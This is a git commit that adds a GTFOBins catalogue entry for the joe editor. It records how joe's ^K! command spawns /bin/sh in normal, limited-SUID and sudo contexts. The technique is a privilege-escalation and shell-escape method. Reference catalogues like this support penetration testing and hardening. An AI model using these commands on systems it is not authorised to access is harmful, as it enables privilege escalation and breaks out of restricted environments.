Add joe shell

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Enrico Cavalli
2023-01-13 13:13:49 +01:00
committed by GitHub
parent 10803acc42
commit 1a56fc4184

15
_gtfobins/joe.md Normal file
View File

@@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
joe
^K!/bin/sh
limited-suid:
- code: |
./joe
^K!/bin/sh
sudo:
- code: |
sudo joe
^K!/bin/sh
---